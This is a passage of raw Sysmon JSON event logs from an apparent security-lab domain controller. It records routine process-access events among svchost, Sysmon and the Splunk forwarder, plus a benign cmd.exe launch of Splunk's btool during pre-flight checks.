05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001006440500}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001006440500}","TargetProcessId":"1204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.872\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-001006440500}\r\nSourceProcessId: 1204\r\nSourceThreadId: 1160\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.872","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-001006440500}","SourceProcessId":"1204","SourceThreadId":"1160","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.872\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001006440500}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.872","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001006440500}","TargetProcessId":"1204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.953\r\nProcessGuid: {A837DB8D-023B-5F25-0000-001061470500}\r\nProcessId: 4404\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.953","ProcessGuid":"{A837DB8D-023B-5F25-0000-001061470500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001061470500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 